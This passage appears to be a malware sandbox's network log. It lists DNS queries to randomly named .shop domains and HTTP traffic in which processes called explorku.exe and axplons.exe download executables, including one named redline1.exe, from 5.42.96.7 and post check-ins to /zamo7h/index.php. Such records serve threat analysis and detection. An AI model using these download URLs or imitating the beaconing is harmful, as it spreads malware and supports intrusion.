                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  obsceneclassyjuwks.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.192.5
                                                                                                                                                                                                                                                                  obsceneclassyjuwks.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.21.20.88
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  33.128.172.185.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  33.128.172.185.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  sweetsquarediaslw.shop
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  sweetsquarediaslw.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  sweetsquarediaslw.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.21.44.201
                                                                                                                                                                                                                                                                  sweetsquarediaslw.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.203.170
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  boredimperissvieos.shop
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  boredimperissvieos.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  boredimperissvieos.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.186.30
                                                                                                                                                                                                                                                                  boredimperissvieos.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.21.72.135
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  67.113.215.185.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  67.113.215.185.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  smallelementyjdui.shop
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  smallelementyjdui.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  smallelementyjdui.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.162.147
                                                                                                                                                                                                                                                                  smallelementyjdui.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.21.15.116
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  tendencyportionjsuk.shop
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  tendencyportionjsuk.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  tendencyportionjsuk.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.21.85.127
                                                                                                                                                                                                                                                                  tendencyportionjsuk.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.205.185
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  appetitesallooonsj.shop
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  appetitesallooonsj.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  appetitesallooonsj.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.21.48.123
                                                                                                                                                                                                                                                                  appetitesallooonsj.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.151.60
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  minorittyeffeoos.shop
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  minorittyeffeoos.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  minorittyeffeoos.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.21.3.125
                                                                                                                                                                                                                                                                  minorittyeffeoos.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.130.179
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  NWyLerfTdX.NWyLerfTdX
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  NWyLerfTdX.NWyLerfTdX
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  77.190.18.2.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  77.190.18.2.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  77.190.18.2.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  a2-18-190-77deploystaticakamaitechnologiescom
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  onlycitylink.com
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  onlycitylink.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  onlycitylink.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.182.192
                                                                                                                                                                                                                                                                  onlycitylink.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.21.18.166
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  235.3.20.104.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  235.3.20.104.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  192.186.117.34.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  192.186.117.34.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  192.186.117.34.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  19218611734bcgoogleusercontentcom
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  self.events.data.microsoft.com
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  self.events.data.microsoft.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  self.events.data.microsoft.com
                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                  self-events-data.trafficmanager.net
                                                                                                                                                                                                                                                                  self-events-data.trafficmanager.net
                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                  onedscolprdwus20.westus.cloudapp.azure.com
                                                                                                                                                                                                                                                                  onedscolprdwus20.westus.cloudapp.azure.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  20.189.173.25
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://5.42.96.7/cost/sarra.exe
                                                                                                                                                                                                                                                                  explorku.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /cost/sarra.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:17 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                  Content-Length: 2490880
                                                                                                                                                                                                                                                                  Last-Modified: Sat, 11 May 2024 22:16:57 GMT
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  ETag: "663fee59-260200"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://5.42.96.7/mine/amers.exe
                                                                                                                                                                                                                                                                  explorku.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /mine/amers.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:19 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                  Content-Length: 1882112
                                                                                                                                                                                                                                                                  Last-Modified: Sat, 11 May 2024 22:18:02 GMT
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  ETag: "663fee9a-1cb800"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://5.42.96.7/cost/random.exe
                                                                                                                                                                                                                                                                  explorku.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /cost/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:22 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                  Content-Length: 2295824
                                                                                                                                                                                                                                                                  Last-Modified: Sat, 11 May 2024 22:16:28 GMT
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  ETag: "663fee3c-230810"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  7.96.42.5.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  7.96.42.5.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  acceptabledcooeprs.shop
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  acceptabledcooeprs.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  acceptabledcooeprs.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.21.59.156
                                                                                                                                                                                                                                                                  acceptabledcooeprs.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.180.137
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  5.192.67.172.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  5.192.67.172.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  146.53.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  146.53.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  72.183.67.172.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  72.183.67.172.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  184.139.19.162.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  184.139.19.162.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  184.139.19.162.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  p062minerscom
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  40.169.67.172.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  40.169.67.172.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  headraisepresidensu.shop
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  headraisepresidensu.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  headraisepresidensu.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.21.50.137
                                                                                                                                                                                                                                                                  headraisepresidensu.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.206.145
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  137.50.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  137.50.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  157.92.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  157.92.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  ctldl.windowsupdate.com
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  ctldl.windowsupdate.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  ctldl.windowsupdate.com
                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                  ctldl.windowsupdate.com.delivery.microsoft.com
                                                                                                                                                                                                                                                                  ctldl.windowsupdate.com.delivery.microsoft.com
                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                  wu-b-net.trafficmanager.net
                                                                                                                                                                                                                                                                  wu-b-net.trafficmanager.net
                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                  download.windowsupdate.com.edgesuite.net
                                                                                                                                                                                                                                                                  download.windowsupdate.com.edgesuite.net
                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                  a767.dspw65.akamai.net
                                                                                                                                                                                                                                                                  a767.dspw65.akamai.net
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  2.18.190.77
                                                                                                                                                                                                                                                                  a767.dspw65.akamai.net
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  2.18.190.79
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  pastebin.com
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  pastebin.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  pastebin.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.20.3.235
                                                                                                                                                                                                                                                                  pastebin.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.19.24
                                                                                                                                                                                                                                                                  pastebin.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.20.4.235
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  firstfirecar.com
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  firstfirecar.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  firstfirecar.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.21.60.76
                                                                                                                                                                                                                                                                  firstfirecar.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.193.220
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  14.90.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  14.90.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  svc.iolo.com
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  svc.iolo.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  svc.iolo.com
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  20.157.87.45
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  148.155.9.20.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  148.155.9.20.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://5.42.96.7/zamo7h/index.php
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /zamo7h/index.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:26 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://5.42.96.7/zamo7h/index.php
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /zamo7h/index.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Content-Length: 160
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:26 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://5.42.96.7/lend/alex.exe
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /lend/alex.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:26 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                  Content-Length: 2831872
                                                                                                                                                                                                                                                                  Last-Modified: Sat, 11 May 2024 20:05:26 GMT
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  ETag: "663fcf86-2b3600"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://5.42.96.7/zamo7h/index.php
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /zamo7h/index.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:28 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://5.42.96.7/lend/gold.exe
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /lend/gold.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:28 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                  Content-Length: 412448
                                                                                                                                                                                                                                                                  Last-Modified: Sat, 11 May 2024 20:05:30 GMT
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  ETag: "663fcf8a-64b20"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://5.42.96.7/zamo7h/index.php
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /zamo7h/index.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:30 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                  http://5.42.96.7/lend/redline1.exe
                                                                                                                                                                                                                                                                  axplons.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.7:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  GET /lend/redline1.exe HTTP/1.1
                                                                                                                                                                                                                                                                  Host: 5.42.96.7
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
